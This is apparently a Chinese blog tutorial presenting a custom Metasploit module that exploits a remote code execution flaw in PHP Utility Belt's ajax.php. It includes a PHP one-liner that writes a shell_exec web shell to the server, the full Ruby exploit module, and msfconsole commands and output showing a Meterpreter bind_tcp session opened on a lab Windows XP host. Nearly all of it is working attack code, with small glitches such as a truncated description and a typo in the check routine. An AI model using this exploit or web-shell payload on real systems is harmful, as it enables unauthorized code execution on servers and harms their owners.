Metasploit渗透php-utility-belt程序

fwrite(fopen('info.php','w'), '<?php $a = "net user"; echo shell_exec($a);?>');

##
# Author 冰河
# Date 2019-01-17
# Description Metasploit渗透 php utility belt
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  include Msf:: Exploit::Remote::HttpClient
  
  def initialize(info = {})
    super(update_info(info,
      'Name'              => 'PHP Utility Belt Remote Code Execution',
      'Description'       => %q{
          This module exploits a remote code execution vulnerability in P
        },
       'Author'           =>
        [
          'binghe'
        ],
       
       'DisclosureDate'   => '2019-01-17',
       'Platform'         => 'php',
       'Payload'          =>
        {
          'Space'         => 2000,
          # 现在的漏洞在一个Web应用程序中，而不是在软件程序中，所以要将DisableNops的值设置为true以关闭攻击载荷中的NOP
          'DisableNops'   => true   
        },
       
       'Targets'          =>
        [
          ['PHP Utility Belt', {}]
        ],
       'DefaultTarget'   => 0))
    
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']),
        OptString.new('CHECKURI', [false, 'Checking Perpose', '/php-utility-belt/info.php']),
      ], self.class) 
    end
    
    def check
      send_request_cgi(
          'method'        => 'POST',
          'uri'           => normalize_uri(target_uri.path),
          'vars_post'     => {
              'code'      => "fwrite(fopen('info.php','w'), '<?php echo phpinfo();?>');"
            }
      )   
    resp = send_request_raw({'uri'  => normalize_uri(datastore['CHECKURI']), 'method' => 'GET'})
    if resp.body = ~/phpinfo()/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
   end
   
   def exploit
    send_request_cgi(
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri.path),
      'vars_post'     => {
        'code'        => payload.encoded
      }
    )
   end
   
end

msfconsole
use exploit/web/php/php_utility_belt_attack_by_binghe 
set payload php/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
sysinfo

msf > use exploit/web/php/php_utility_belt_attack_by_binghe 
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp
msf exploit(web/php/php_utility_belt_attack_by_binghe) > set RHOST 192.168.109.141
RHOST => 192.168.109.141
msf exploit(web/php/php_utility_belt_attack_by_binghe) > show options

Module options (exploit/web/php/php_utility_belt_attack_by_binghe):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   CHECKURI   /php-utility-belt/info.php  no        Checking Perpose
   Proxies                                no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.109.141             yes       The target address
   RPORT      80                          yes       The target port (TCP)
   SSL        false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /php-utility-belt/ajax.php  yes       The path to PHP Utility Belt
   VHOST                                  no        HTTP server virtual host


Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.109.141  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   PHP Utility Belt


msf exploit(web/php/php_utility_belt_attack_by_binghe) > exploit

[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (38247 bytes) to 192.168.109.141

meterpreter > sysinfo
Computer    : LIUYAZHUANG
OS          : Windows NT LIUYAZHUANG 5.1 build 2600 (Windows XP Professional Service Pack 3) i586
Meterpreter : php/windows
meterpreter >